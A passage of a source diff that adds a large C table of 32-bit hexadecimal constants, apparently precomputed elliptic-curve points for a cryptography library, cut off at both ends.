UINT32_C(0x1C024C91), UINT32_C(0x5EE6B271), UINT32_C(0x453DB663), ++ UINT32_C(0xD0248FF5), UINT32_C(0xADB835E8), UINT32_C(0xD6D81CB2) }, ++ { UINT32_C(0xFDFCB4C7), UINT32_C(0x8696CFEC), UINT32_C(0x53BC9045), ++ UINT32_C(0x696B7FCB), UINT32_C(0xDDA56981), UINT32_C(0xAB4D3807), ++ UINT32_C(0x1E4B943B), UINT32_C(0x2F998052), UINT32_C(0x166B7F18), ++ UINT32_C(0x8AA76ADB), UINT32_C(0x52A2D7ED), UINT32_C(0x63934301) } }, ++ }, ++ { ++ { { UINT32_C(0xA368EFF6), UINT32_C(0xBBCCCE39), UINT32_C(0x8CEB5C43), ++ UINT32_C(0xD8CAABDF), UINT32_C(0xD2252FDA), UINT32_C(0x9EAE35A5), ++ UINT32_C(0x54E7DD49), UINT32_C(0xA8F4F209), UINT32_C(0x295100FD), ++ UINT32_C(0xA56D72A6), UINT32_C(0x56767727), UINT32_C(0x20FC1FE8) }, ++ { UINT32_C(0x0BBAA5AB), UINT32_C(0xBF60B248), UINT32_C(0x313911F2), ++ UINT32_C(0xA4F3CE5A), UINT32_C(0xB93DAB9C), UINT32_C(0xC2A67AD4), ++ UINT32_C(0x22D71F39), UINT32_C(0x18CD0ED0), UINT32_C(0x5F304DB2), ++ UINT32_C(0x04380C42), UINT32_C(0x6729C821), UINT32_C(0x26420CBB) } }, ++ { { UINT32_C(0xBDFBCAE8), UINT32_C(0x26BD07D6), UINT32_C(0xDF01A80A), ++ UINT32_C(0x10B5173F), UINT32_C(0x6798B96C), UINT32_C(0xD831C546), ++ UINT32_C(0x1D3F3859), UINT32_C(0x1D6B4108), UINT32_C(0x991B9EC7), ++ UINT32_C(0x501D38EC), UINT32_C(0xD78431A9), UINT32_C(0x26319283) }, ++ { UINT32_C(0x118B343C), UINT32_C(0x8B85BAF7), UINT32_C(0x58DEF7D0), ++ UINT32_C(0x4696CDDD), UINT32_C(0x7ACDCF58), UINT32_C(0xEFC7C110), ++ UINT32_C(0x848D5842), UINT32_C(0xD9AF415C), UINT32_C(0x0AC7FDAC), ++ UINT32_C(0x6B5A06BC), UINT32_C(0xA344319B), UINT32_C(0x7D623E0D) } }, ++ { { UINT32_C(0x0C9D3547), UINT32_C(0x4C0D7806), UINT32_C(0xCF2AED47), ++ UINT32_C(0x993F048D), UINT32_C(0xE4B57E22), UINT32_C(0x5217C453), ++ UINT32_C(0xF4172B28), UINT32_C(0xB4669E35), UINT32_C(0x49F999F8), ++ UINT32_C(0x509A3CD0), UINT32_C(0x87C69D41), UINT32_C(0xD19F8632) }, ++ { UINT32_C(0x4C8FDED0), UINT32_C(0xE14D01E8), UINT32_C(0xEAFD9E1C), ++ UINT32_C(0x342880FD), UINT32_C(0x70DC2BF0), UINT32_C(0x0E17BFF2), ++ UINT32_C(0xC0186400), UINT32_C(0x46560B7B), UINT32_C(0x49A4DD34), ++ UINT32_C(0xE28C7B9C), UINT32_C(0x0F325D06), UINT32_C(0x18211916) } }, ++ { { UINT32_C(0xD7E02E18), UINT32_C(0x46D70888), UINT32_C(0xD9F11FD9), ++ UINT32_C(0x7C806954), UINT32_C(0x4FBEA271), UINT32_C(0xE4948FCA), ++ UINT32_C(0xBD80A9DF), UINT32_C(0x7D6C7765), UINT32_C(0xF3871C71), ++ UINT32_C(0x1B470EA6), UINT32_C(0x8330A570), UINT32_C(0xD62DE244) }, ++ { UINT32_C(0xC659C3A7), UINT32_C(0xDAECDDC1), UINT32_C(0x077F7AFC), ++ UINT32_C(0x8621E513), UINT32_C(0xCAEEEF13), UINT32_C(0x56C7CD84), ++ UINT32_C(0xC685A356), UINT32_C(0xC60C910F), UINT32_C(0x9DD93DDC), ++ UINT32_C(0xE68BC5C5), UINT32_C(0xFEB64895), UINT32_C(0xD904E89F) } }, ++ { { UINT32_C(0x8BA7917A), UINT32_C(0x75D874FB), UINT32_C(0xFD043BD4), ++ UINT32_C(0x18FA7F53), UINT32_C(0x1FC3979E), UINT32_C(0x212A0AD7), ++ UINT32_C(0x5D6EAC0E), UINT32_C(0x5703A7D9), UINT32_C(0x017DEAD5), ++ UINT32_C(0x222F7188), UINT32_C(0x0F6C1817), UINT32_C(0x1EC687B7) }, ++ { UINT32_C(0x238BACB6), UINT32_C(0x23412FC3), UINT32_C(0x54CED154), ++ UINT32_C(0xB85D70E9), UINT32_C(0xBDA674D0), UINT32_C(0xD4E06722), ++ UINT32_C(0x36F5A0C2), UINT32_C(0x3EA5F178), UINT32_C(0xF5C6D2CA), ++ UINT32_C(0x7E7D79CF), UINT32_C(0x3DBB3C73), UINT32_C(0x1FFF9464) } }, ++ { { UINT32_C(0xF163E4A8), UINT32_C(0x916E19D0), UINT32_C(0x1489DF17), ++ UINT32_C(0x1E6740E7), UINT32_C(0x339F3A47), UINT32_C(0x1EAF9723), ++ UINT32_C(0x124B8DAD), UINT32_C(0x22F0ED1A), UINT32_C(0x49C3DD04), ++ UINT32_C(0x39C9166C), UINT32_C(0xCE1E9ACC), UINT32_C(0x628E7FD4) }, ++ { UINT32_C(0x40031676), UINT32_C(0x124DDF27), UINT32_C(0x1EDDB9BE), ++ UINT32_C(0x00256939), UINT32_C(0xD360B0DA), UINT32_C(0xD39E25E7), ++ UINT32_C(0x4AA6C4C9), UINT32_C(0x6E3015A8), UINT32_C(0x623EDA09), ++ UINT32_C(0xC6A2F643), UINT32_C(0x50AA99FB), UINT32_C(0xBEFF2D12) } }, ++ { { UINT32_C(0x93EE8089), UINT32_C(0x1FEEF7CE), UINT32_C(0x252DD7BD), ++ UINT32_C(0xC6B180BC), UINT32_C(0x1788F051), UINT32_C(0xA16FB20B), ++ UINT32_C(0xE046ED39), UINT32_C(0xD86FD392), UINT32_C(0x9378CE1D), ++ UINT32_C(0xDA0A3611), UINT32_C(0xA5F7A61D), UINT32_C(0x121EF3E7) }, ++ { UINT32_C(0x92D13CAE), UINT32_C(0x94D22061), UINT32_C(0x77C72E08), ++ UINT32_C(0x5076046A), UINT32_C(0x7D2308B9), UINT32_C(0xF18BC233), ++ UINT32_C(0x17F977B1), UINT32_C(0x004DB3C5), UINT32_C(0x0471C11D), ++ UINT32_C(0xD05AE399), UINT32_C(0x85CD1726), UINT32_C(0x86A2A557) } }, ++ { { UINT32_C(0x72107804), UINT32_C(0xB8D9B286), UINT32_C(0x3303B79B), ++ UINT32_C(0xB5A7C413), UINT32_C(0x5FA37DED), UINT32_C(0x927EEF78), ++ UINT32_C(0xAD67DABA), UINT32_C(0xA1C5CF1E), UINT32_C(0x7360E7C7), ++ UINT32_C(0xAA5E3FB2), UINT32_C(0x0A0C0993), UINT32_C(0x8354E61A) }, ++ { UINT32_C(0x7F5458CC), UINT32_C(0x2EC73AF9), UINT32_C(0x48474325), ++ UINT32_C(0xDE4CB488), UINT32_C(0x7209BC69), UINT32_C(0x2DD134C7), ++ UINT32_C(0x451A2ABE), UINT32_C(0xB70C5567), UINT32_C(0x8E293018), ++ UINT32_C(0x2CD1B200), UINT32_C(0xD33C0D72), UINT32_C(0x15F8DA7A) } }, ++ { { UINT32_C(0xA8790657), UINT32_C(0x5DC386D0), UINT32_C(0xBC4D88BB), ++ UINT32_C(0xA4FDF676), UINT32_C(0x48BC6C49), UINT32_C(0x1B21F38F), ++ UINT32_C(0x543A7003), UINT32_C(0xCDCC7FAA), UINT32_C(0x8C9CF72C), ++ UINT32_C(0xEA97E7AA), UINT32_C(0x50D938A8), UINT32_C(0xA6B883F4) }, ++ { UINT32_C(0xA3A10F27), UINT32_C(0x51936F3A), UINT32_C(0xDECC76BF), ++ UINT32_C(0x0170785F), UINT32_C(0x908C578A), UINT32_C(0x7539ECE1), ++ UINT32_C(0x0F3E8C25), UINT32_C(0x5D9C8A8E), UINT32_C(0x9E4717A7), ++ UINT32_C(0x8681B43B), UINT32_C(0xA9D83E39), UINT32_C(0x94F42507) } }, ++ { { UINT32_C(0xA55ADDE7), UINT32_C(0xBBE11CA8), UINT32_C(0x3BC0896B), ++ UINT32_C(0x39E6F5CF), UINT32_C(0x1D2D8D94), UINT32_C(0x1447314E), ++ UINT32_C(0x5B012F8A), UINT32_C(0x45B48125), UINT32_C(0x08AD5283), ++ UINT32_C(0x41AD23FA), UINT32_C(0x41D13774), UINT32_C(0x837243E2) }, ++ { UINT32_C(0xBADCAA46), UINT32_C(0x1FC0BD9D), UINT32_C(0x26E84CAE), ++ UINT32_C(0x8DF164ED), UINT32_C(0x41017176), UINT32_C(0x8FF70EC0), ++ UINT32_C(0x5C848BA7), UINT32_C(0x23AD4BCE), UINT32_C(0x97A19CBB), ++ UINT32_C(0x89246FDE), UINT32_C(0x78397991), UINT32_C(0xA5EF987B) } }, ++ { { UINT32_C(0x4757964D), UINT32_C(0x111AF1B7), UINT32_C(0xDDBBF258), ++ UINT32_C(0x1D25D351), UINT32_C(0x7D2B06D6), UINT32_C(0x4161E776), ++ UINT32_C(0x1CAC0C5B), UINT32_C(0x6EFD2691), UINT32_C(0x211BFAEB), ++ UINT32_C(0x633B95DB), UINT32_C(0xE2BDF701), UINT32_C(0x9BEDFA5A) }, ++ { UINT32_C(0x73E099C8), UINT32_C(0xADAC2B0B), UINT32_C(0xBFB16BFF), ++ UINT32_C(0x436F0023), UINT32_C(0x30F55854), UINT32_C(0xB91B1002), ++ UINT32_C(0xF4C6C8B7), UINT32_C(0xAF6A2097), UINT32_C(0x3AD7B3D9), ++ UINT32_C(0x3FF65CED), UINT32_C(0x330E56DF), UINT32_C(0x6FA2626F) } }, ++ { { UINT32_C(0xFFCCFD07), UINT32_C(0x3D28BF2D), UINT32_C(0xD989603B), ++ UINT32_C(0x0514F6FF), UINT32_C(0x5514787A), UINT32_C(0xB9519629), ++ UINT32_C(0xC3DB4E9C), UINT32_C(0xA1848121), UINT32_C(0x2A3D4595), ++ UINT32_C(0x47FE2E39), UINT32_C(0x11B73ED4), UINT32_C(0x506F5D82) }, ++ { UINT32_C(0xA600D8BB), UINT32_C(0xA2257AE7), UINT32_C(0x0F9F122C), ++ UINT32_C(0xD659DBD1), UINT32_C(0x64DF160F), UINT32_C(0xDB0FDC67), ++ UINT32_C(0x7CB19690), UINT32_C(0xFF379339), UINT32_C(0x98E72EC1), ++ UINT32_C(0xDF4366B8), UINT32_C(0xDF437EB8), UINT32_C(0x97E72BEC) } }, ++ { { UINT32_C(0x1C81E5D9), UINT32_C(0x81DCEA27), UINT32_C(0x6717FC49), ++ UINT32_C(0x7E1B6CDA), UINT32_C(0x11EAE80D), UINT32_C(0xAA36B3B5), ++ UINT32_C(0x3CD7CBB3), UINT32_C(0x1306687C), UINT32_C(0xC4E89064), ++ UINT32_C(0xED670235), UINT32_C(0x58A94760), UINT32_C(0x9D3B0009) }, ++ { UINT32_C(0xE6A6333C), UINT32_C(0x5A64E158), UINT32_C(0x49453203), ++ UINT32_C(0x1A8B4A36), UINT32_C(0x1F77CC21), UINT32_C(0xF1CAD724), ++ UINT32_C(0x70518EF7), UINT32_C(0x693EBB4B), UINT32_C(0x0F39C91A), ++ UINT32_C(0xFB47BD81), UINT32_C(0xFA4BC64B), UINT32_C(0xCFE63DA2) } }, ++ { { UINT32_C(0xEAA66108), UINT32_C(0x82C1C684), UINT32_C(0x4CFE79FC), ++ UINT32_C(0xE3226218), UINT32_C(0x849C720E), UINT32_C(0x3F28B72B), ++ UINT32_C(0x8FEE1CA8), UINT32_C(0x137FB355), UINT32_C(0xE4F90C4E), ++ UINT32_C(0x4D18A9CD), UINT32_C(0xCC3E46FA), UINT32_C(0xC0344227) }, ++ { UINT32_C(0x79CDA392), UINT32_C(0x4FD5C08E), UINT32_C(0x8ADC87B5), ++ UINT32_C(0x65DB20DB), UINT32_C(0x916C1B84), UINT32_C(0x86F95D5B), ++ UINT32_C(0x17BB2B7C), UINT32_C(0x7EDA3871), UINT32_C(0x669A533B), ++ UINT32_C(0x18CCF7E7), UINT32_C(0xECAD0E06), UINT32_C(0x5E92421C) } }, ++ { { UINT32_C(0x4174B08B), UINT32_C(0x26063E12), UINT32_C(0x70DE8E4D), ++ UINT32_C(0xE621D9BE), UINT32_C(0x5ECDF350), UINT32_C(0xAEA0FD0F), ++ UINT32_C(0x9C20E5C9), UINT32_C(0x0D9F69E4), UINT32_C(0x0BBE2918), ++ UINT32_C(0xD3DADEB9), UINT32_C(0x58AA2F71), UINT32_C(0xD7B9B5DB) }, ++ { UINT32_C(0x3364CAF8), UINT32_C(0x7A971DD7), UINT32_C(0xC25D4BE4), ++ UINT32_C(0x702616A3), UINT32_C(0xA9E30071), UINT32_C(0xA30F0FA1), ++ UINT32_C(0x5573BC69), UINT32_C(0x98AB2438), UINT32_C(0x6FEC2E22), ++ UINT32_C(0xCBC63CDF), UINT32_C(0xCC901B9B), UINT32_C(0x965F90ED) } }, ++ { { UINT32_C(0x71E15BB3), UINT32_C(0xD53B592D), UINT32_C(0x8820E0D0), ++ UINT32_C(0x1F03C0E9), UINT32_C(0x3CCCB726), UINT32_C(0xCE93947D), ++ UINT32_C(0x1D547590), UINT32_C(0x2790FEE0), UINT32_C(0xC59CDD7A), ++ UINT32_C(0x4401D847), UINT32_C(0xA926DD9D), UINT32_C(0x72D69120) }, ++ { UINT32_C(0x4229F289), UINT32_C(0x38B8F21D), UINT32_C(0x7FE978AF), ++ UINT32_C(0x9F412E40), UINT32_C(0xCDB59AF1), UINT32_C(0xAE07901B), ++ UINT32_C(0xD1D4715E), UINT32_C(0x1E6BE5EB), UINT32_C(0x18C96BEF), ++ UINT32_C(0x3715BD8B), UINT32_C(0xE11B3798), UINT32_C(0x4B71F6E6) } }, ++ }, ++ { ++ { { UINT32_C(0xF0CE2DF4), UINT32_C(0x11A8FDE5), UINT32_C(0xFA8D26DF), ++ UINT32_C(0xBC70CA3E), UINT32_C(0xC74DFE82), UINT32_C(0x6818C275), ++ UINT32_C(0x38373A50), UINT32_C(0x2B0294AC), UINT32_C(0xE8E5F88F), ++ UINT32_C(0x584C4061), UINT32_C(0x7342383A), UINT32_C(0x1C05C1CA) }, ++ { UINT32_C(0x911430EC), UINT32_C(0x263895B3), UINT32_C(0xA5171453), ++ UINT32_C(0xEF9B0032), UINT32_C(0x84DA7F0C), UINT32_C(0x144359DA), ++ UINT32_C(0x924A09F2), UINT32_C(0x76E3095A), UINT32_C(0xD69AD835), ++ UINT32_C(0x612986E3), UINT32_C(0x392122AF), UINT32_C(0x70E03ADA) } }, ++ { { UINT32_C(0x67AAD17B), UINT32_C(0xFEB707EE), UINT32_C(0x83042995), ++ UINT32_C(0xBB21B287), UINT32_C(0x9A0D32BA), UINT32_C(0x26DE1645), ++ UINT32_C(0x1FFB9266), UINT32_C(0x9A2FF38A), UINT32_C(0x8F578B4A), ++ UINT32_C(0x4E5AD96D), UINT32_C(0x883E7443), UINT32_C(0x26CC0655) }, ++ { UINT32_C(0x2EE9367A), UINT32_C(0x1D8EECAB), UINT32_C(0x881DE2F8), ++ UINT32_C(0x42B84337), UINT32_C(0xD758AE41), UINT32_C(0xE49B2FAE), ++ UINT32_C(0x4A85D867), UINT32_C(0x6A9A2290), UINT32_C(0xE68CBA86), ++ UINT32_C(0x2FB89DCE), UINT32_C(0x7F09A982), UINT32_C(0xBC252635) } }, ++ { { UINT32_C(0x8C61AAAC), UINT32_C(0xADC79436), UINT32_C(0x5E926563), ++ UINT32_C(0x24C7FD13), UINT32_C(0x0406C129), UINT32_C(0xEF9FAAA4), ++ UINT32_C(0x8B658D3C), UINT32_C(0xF4E6388C), UINT32_C(0x1E435BAF), ++ UINT32_C(0x7262BEB4), UINT32_C(0xFDAEAC99), UINT32_C(0x3BF622CC) }, ++ { UINT32_C(0x4E1AEDDC), UINT32_C(0xD359F7D8), UINT32_C(0xD78C17B7), ++ UINT32_C(0x05DC4F8C), UINT32_C(0x29498BA5), UINT32_C(0xB18CF032), ++ UINT32_C(0x85BF35AD), UINT32_C(0xC67388CA), UINT32_C(0x62AA4BC8), ++ UINT32_C(0x8A7A6AA2), UINT32_C(0x72F4627A), UINT32_C(0x0B8F458E) } }, ++ { { UINT32_C(0xC68E4488), UINT32_C(0x3FB812EE), UINT32_C(0x60EF7281), ++ UINT32_C(0x53C5EAA4), UINT32_C(0x8FBEFBE4), UINT32_C(0xE5724183), ++ UINT32_C(0xA4B24A05), UINT32_C(0x2B7D49F4), UINT32_C(0x710C0A43), ++ UINT32_C(0x23B138D0), UINT32_C(0xA85EC1DB), UINT32_C(0x16A5B4C1) }, ++ { UINT32_C(0x305FEB02), UINT32_C(0x7CC1F3D7), UINT32_C(0x5B6C1B54), ++ UINT32_C(0x52F7947D), UINT32_C(0x8F56981C), UINT32_C(0x1BDA2312), ++ UINT32_C(0xB4080A01), UINT32_C(0x68663EAE), UINT32_C(0x9F999B7F), ++ UINT32_C(0x8DD7BA7E), UINT32_C(0xB686580C), UINT32_C(0xD8768D19) } }, ++ { { UINT32_C(0x7AFDDA94), UINT32_C(0xBCD0E0AD), UINT32_C(0x34A30687), ++ UINT32_C(0x95A0DBBE), UINT32_C(0x8C5E2665), UINT32_C(0xBBE3C3DF), ++ UINT32_C(0xEBF2BC16), UINT32_C(0x742BECD8), UINT32_C(0x3FA163A6), ++ UINT32_C(0x300CEB48), UINT32_C(0x4663354B), UINT32_C(0x0C5D02EE) }, ++ { UINT32_C(0xB5E606A4), UINT32_C(0xE4FB9AD6), UINT32_C(0xCF49FF95), ++ UINT32_C(0x93F507B8), UINT32_C(0x585C193B), UINT32_C(0x9406A90C), ++ UINT32_C(0x4ECF9517), UINT32_C(0xAD1440C1), UINT32_C(0x9CEA53F1), ++ UINT32_C(0x184CB475), UINT32_C(0x8EF11302), UINT32_C(0x6855C474) } }, ++ { { UINT32_C(0xEDCAFA52), UINT32_C(0x00ECB523), UINT32_C(0x086F69D3), ++ UINT32_C(0x0DA0AE0E), UINT32_C(0xC242F347), UINT32_C(0xC384DE15), ++ UINT32_C(0x848C12B7), UINT32_C(0xFB050E6E), UINT32_C(0x64E015CE), ++ UINT32_C(0x22F67654), UINT32_C(0x7CA122F2), UINT32_C(0xCBDC2A48) }, ++ { UINT32_C(0x445FB02C), UINT32_C(0xA940D973), UINT32_C(0x3767D89D), ++ UINT32_C(0x00F31E78), UINT32_C(0x613DABDD), UINT32_C(0x2B65A237), ++ UINT32_C(0xC875AE09), UINT32_C(0x2BE0AB05), UINT32_C(0xBA204F8E), ++ UINT32_C(0xB22E54FD), UINT32_C(0x0F7687B9), UINT32_C(0x65E2029D) } }, ++ { { UINT32_C(0x1855A71C), UINT32_C(0xFFD82538), UINT32_C(0x438BD8D8), ++ UINT32_C(0x26A330B3), UINT32_C(0xF9D8C5F9), UINT32_C(0x89628311), ++ UINT32_C(0x953738A0), UINT32_C(0x8D5FB9CF), UINT32_C(0xEDFCD4E5), ++ UINT32_C(0xCB7159C9), UINT32_C(0x2064C7C2), UINT32_C(0xD64E5230) }, ++ { UINT32_C(0x689F3CFE), UINT32_C(0xF858ED80), UINT32_C(0x56128B67), ++ UINT32_C(0x4830E309), UINT32_C(0xE0E90688), UINT32_C(0x2E1692DA), ++ UINT32_C(0xCA9CC232), UINT32_C(0xAB818913), UINT32_C(0xA5D229A6), ++ UINT32_C(0xE2E30C23), UINT32_C(0x0E740E23), UINT32_C(0xA544E8B1) } }, ++ { { UINT32_C(0xDC61E6CC), UINT32_C(0x1C15E569), UINT32_C(0x58FC7800), ++ UINT32_C(0x8FD72967), UINT32_C(0x37A9DFC5), UINT32_C(0xE61E7DB7), ++ UINT32_C(0x5AFD7822), UINT32_C(0x3F34A9C6), UINT32_C(0x19E80773), ++ UINT32_C(0x0A112742), UINT32_C(0x4760FC58), UINT32_C(0xA353460C) }, ++ { UINT32_C(0xB3124C71), UINT32_C(0x2FB7DEEB), UINT32_C(0x2D4009CC), ++ UINT32_C(0x48463627), UINT32_C(0xC3A10370), UINT32_C(0x399D1933), ++ UINT32_C(0x54388DBD), UINT32_C(0x7EB19450), UINT32_C(0x7C2A006A), ++ UINT32_C(0x8ECCE639), UINT32_C(0x55C932A0), UINT32_C(0x3D565DAF) } }, ++ { { UINT32_C(0xD9ADAE53), UINT32_C(0xCEF57A9F), UINT32_C(0xF83FD8CD), ++ UINT32_C(0xE2EB27D7), UINT32_C(0x9BBD2DDE), UINT32_C(0x4AC8F719), ++ UINT32_C(0xE91ABFB7), UINT32_C(0x604283AA), UINT32_C(0x34799F87), ++ UINT32_C(0xB6A4E115), UINT32_C(0xE4C2A8F3), UINT32_C(0x2B253224) }, ++ { UINT32_C(0xC8782294), UINT32_C(0xC34F8B92), UINT32_C(0xFCC2CB6B), ++ UINT32_C(0xC74D697D), UINT32_C(0xC2C84C46), UINT32_C(0xD990411B), ++ UINT32_C(0x31EA4955), UINT32_C(0x2807B5C6), UINT32_C(0xB9EB27F5), ++ UINT32_C(0x14AE2B93), UINT32_C(0x6163EDFA), UINT32_C(0xF0AE96A7) } }, ++ { { UINT32_C(0x42DB7180), UINT32_C(0xA7BDCBB4), UINT32_C(0xEDCA752F), ++ UINT32_C(0xC9FAA41F), UINT32_C(0xE820F401), UINT32_C(0x147F91B4), ++ UINT32_C(0xF5F2645F), UINT32_C(0x1E6CEF86), UINT32_C(0x31FE711D), ++ UINT32_C(0xB4AB4D7F), UINT32_C(0x743EF882), UINT32_C(0xCE68FB3C) }, ++ { UINT32_C(0x3EF2FCFF), UINT32_C(0xB9D7D682), UINT32_C(0x020DCAFD), ++ UINT32_C(0xF6893811), UINT32_C(0xBF81E760), UINT32_C(0x30D9A50C), ++ UINT32_C(0xB9B87228), UINT32_C(0x7F247D06), UINT32_C(0x5F40CFC0), ++ UINT32_C(0x143D4FEC), UINT32_C(0x329B2A88), UINT32_C(0x21D78D73) } }, ++ { { UINT32_C(0xED3F2055), UINT32_C(0x06B3FF8A), UINT32_C(0x522BE214), ++ UINT32_C(0x50482C77), UINT32_C(0xDDF54620), UINT32_C(0x8DF69CD8), ++ UINT32_C(0xF78A1165), UINT32_C(0x6D1DB204), UINT32_C(0x9AFE6BF2), ++ UINT32_C(0x459AE4A2), UINT32_C(0x24AC871E), UINT32_C(0xC23A9FFD) }, ++ { UINT32_C(0x89E85D81), UINT32_C(0xB7FD22E3), UINT32_C(0x122E9978), ++ UINT32_C(0x297F1F6B), UINT32_C(0x144BE1CE), UINT32_C(0xAB283D66), ++ UINT32_C(0xC00C614E), UINT32_C(0xC1F90AC2), UINT32_C(0x3224CD09), ++ UINT32_C(0x5465576E), UINT32_C(0x441B6059), UINT32_C(0x8E8D910D) } }, ++ { { UINT32_C(0xAAA228BC), UINT32_C(0xF73A060A), UINT32_C(0x56EFF87D), ++ UINT32_C(0xCF1B0783), UINT32_C(0xA54C9133), UINT32_C(0x11EF17C0), ++ UINT32_C(0x76A4DAA5), UINT32_C(0x9E476B15), UINT32_C(0x8018FB92), ++ UINT32_C(0x5624FEAC), UINT32_C(0xCFEEC1B9), UINT32_C(0x9826A0FC) }, ++ { UINT32_C(0x2DFE2046), UINT32_C(0xB732F7FE), UINT32_C(0x3B40DA6A), ++ UINT32_C(0x9260BD9F), UINT32_C(0x4F231773), UINT32_C(0xCC9F908F), ++ UINT32_C(0xDAFC0D55), UINT32_C(0x4827FEB9), UINT32_C(0x538ACE95), ++ UINT32_C(0x07D32E85), UINT32_C(0xB8EDAF37), UINT32_C(0xAD9F897C) } }, ++ { { UINT32_C(0xE3415498), UINT32_C(0x2F75B82F), UINT32_C(0xF1015F30), ++ UINT32_C(0xF99CAC5F), UINT32_C(0x7D7F25DE), UINT32_C(0x76640824), ++ UINT32_C(0xEE74C047), UINT32_C(0x714BC9CD), UINT32_C(0x07448879), ++ UINT32_C(0x70F847BF), UINT32_C(0x072165C0), UINT32_C(0xA14481DE) }, ++ { UINT32_C(0xDB1140A8), UINT32_C(0x9BFA59E3), UINT32_C(0xFCD13502), ++ UINT32_C(0x7B9C7FF0), UINT32_C(0x68459ABF), UINT32_C(0xF4D7538E), ++ UINT32_C(0xC8FC6AD2), UINT32_C(0xED93A791), UINT32_C(0xB51BD9B2), ++ UINT32_C(0xA8BBE2A8), UINT32_C(0x9FB34008), UINT32_C(0x084B5A27) } }, ++ { { UINT32_C(0xEB138C84), UINT32_C(0xB3BB9545), UINT32_C(0x3FC88BFD), ++ UINT32_C(0x59C3489C), UINT32_C(0x85F53EC7), UINT32_C(0x3A97FF63), ++ UINT32_C(0x0AA69C3D), UINT32_C(0x40FDF5A6), UINT32_C(0x53D19668), ++ UINT32_C(0x0E8CCEC7), UINT32_C(0x33FAA661), UINT32_C(0x0AA72EF9) }, ++ { UINT32_C(0x9B1E684B), UINT32_C(0xF5C5A6CF), UINT32_C(0x31A22EA1), ++ UINT32_C(0x630F9371), UINT32_C(0xAC60F7EA), UINT32_C(0x06B2AAC2), ++ UINT32_C(0x5BC37D80), UINT32_C(0xB181CAE2), UINT32_C(0x247B13EA), ++ UINT32_C(0x4601A929), UINT32_C(0x5F739797), UINT32_C(0x8A71C386) } }, ++ { { UINT32_C(0xAB134786), UINT32_C(0x545387B3), UINT32_C(0x1599B64A), ++ UINT32_C(0x3179BB06), UINT32_C(0x07593574), UINT32_C(0xB0A61986), ++ UINT32_C(0x63FA7C3B), UINT32_C(0xC7E39B21), UINT32_C(0x91585D13), ++ UINT32_C(0xA1173F86), UINT32_C(0xCB9525CD), UINT32_C(0x09D5CC8E) }, ++ { UINT32_C(0x8F3A3451), UINT32_C(0xAAD44FFD), UINT32_C(0x25820CC5), ++ UINT32_C(0x702B04F2), UINT32_C(0x1CB66C17), UINT32_C(0xE90CAC49), ++ UINT32_C(0xEE161DC4), UINT32_C(0x40F6B547), UINT32_C(0x1BA4AC4E), ++ UINT32_C(0xC08BB8B4), UINT32_C(0xAE5A6BC1), UINT32_C(0x7DC064FB) } }, ++ { { UINT32_C(0x9D76DDC7), UINT32_C(0x90A5E871), UINT32_C(0xEDFC8E2E), ++ UINT32_C(0x39DC8FAE), UINT32_C(0x5B079C62), UINT32_C(0x98467A23), ++ UINT32_C(0x05450C98), UINT32_C(0xE25E3785), UINT32_C(0x96140083), ++ UINT32_C(0x2FE23A4D), UINT32_C(0xE9900312), UINT32_C(0x65CE3B9A) }, ++ { UINT32_C(0x6B72B5D9), UINT32_C(0x1D87D088), UINT32_C(0xFD9AFC82), ++ UINT32_C(0x72F53220), UINT32_C(0x9E1F71FA), UINT32_C(0xC63C7C15), ++ UINT32_C(0x8D449637), UINT32_C(0x90DF26EA), UINT32_C(0xC1C2B215), ++ UINT32_C(0x97089F40), UINT32_C(0x42317FAA), UINT32_C(0x83AF2664) } }, ++ }, ++ { ++ { { UINT32_C(0x8D688E31), UINT32_C(0xFA2DB51A), UINT32_C(0xA09C88D4), ++ UINT32_C(0x225B696C), UINT32_C(0x6059171F), UINT32_C(0x9F88AF1D), ++ UINT32_C(0x782A0993), UINT32_C(0x1C5FEA5E), UINT32_C(0x4EC710D3), ++ UINT32_C(0xE0FB1588), UINT32_C(0xD32CE365), UINT32_C(0xFAF372E5) }, ++ { UINT32_C(0x26506F45), UINT32_C(0xD9F896AB), UINT32_C(0x8373C724), ++ UINT32_C(0x8D350338), UINT32_C(0xCA6E7342), UINT32_C(0x1B76992D), ++ UINT32_C(0x6FD0C08B), UINT32_C(0x76338FCA), UINT32_C(0xA00F5C23), ++ UINT32_C(0xC3EA4C65), UINT32_C(0xB316B35B), UINT32_C(0xDFAB29B3) } }, ++ { { UINT32_C(0x483AEBF9), UINT32_C(0x84E5541F), UINT32_C(0x49165772), ++ UINT32_C(0x8ADFF7DC), UINT32_C(0x9BEAAD3C), UINT32_C(0xE0A43AD6), ++ UINT32_C(0xF51C2714), UINT32_C(0x97DD1820), UINT32_C(0x57EA5B0C), ++ UINT32_C(0xAC2B4CB4), UINT32_C(0xD11767CA), UINT32_C(0x87DBD011) }, ++ { UINT32_C(0xBFC7957A), UINT32_C(0x18CCF36C), UINT32_C(0x1BC79227), ++ UINT32_C(0xD4A08841), UINT32_C(0xD8D292A8), UINT32_C(0x9811CE43), ++ UINT32_C(0xD58C4EE7), UINT32_C(0x72C5FC68), UINT32_C(0xD35C65A7), ++ UINT32_C(0x5BC0F0BE), UINT32_C(0xCBBF9669), UINT32_C(0x0B446DBC) } }, ++ { { UINT32_C(0x9CEE9BCE), UINT32_C(0x7EBA3DA6), UINT32_C(0xD5377750), ++ UINT32_C(0x3E2C1248), UINT32_C(0x2B93D8B2), UINT32_C(0x8C917D98), ++ UINT32_C(0x7CAD1F75), UINT32_C(0xCA8FC6AC), UINT32_C(0xA0FF150A), ++ UINT32_C(0x5F581F19), UINT32_C(0xE08327FA), UINT32_C(0x872CC14A) }, ++ { UINT32_C(0xE9333188), UINT32_C(0xC774F187), UINT32_C(0x497AF7E8), ++ UINT32_C(0x528ED4AC), UINT32_C(0x8AD72B10), UINT32_C(0xCE036E9B), ++ UINT32_C(0x917986CF), UINT32_C(0x463F9EBB), UINT32_C(0x1325CF9B), ++ UINT32_C(0xBE516328), UINT32_C(0xDD7E5FEA), UINT32_C(0xD28D5C50) } }, ++ { { UINT32_C(0xDD58BBE3), UINT32_C(0x714C1D1B), UINT32_C(0x039AFD0F), ++ UINT32_C(0x85BA01AE), UINT32_C(0x6951AC80), UINT32_C(0x7F23EA3A), ++ UINT32_C(0xAC00C837), UINT32_C(0x5C599290), UINT32_C(0xBF24CC1B), ++ UINT32_C(0xF6EFA2B3), UINT32_C(0x1E84462B), UINT32_C(0x393D8E42) }, ++ { UINT32_C(0xF8B89453), UINT32_C(0x9BDA627D), UINT32_C(0xB23E0D1B), ++ UINT32_C(0xE66FFF2E), UINT32_C(0xC3B94EC2), UINT32_C(0xD1EE7089), ++ UINT32_C(0x3031699A), 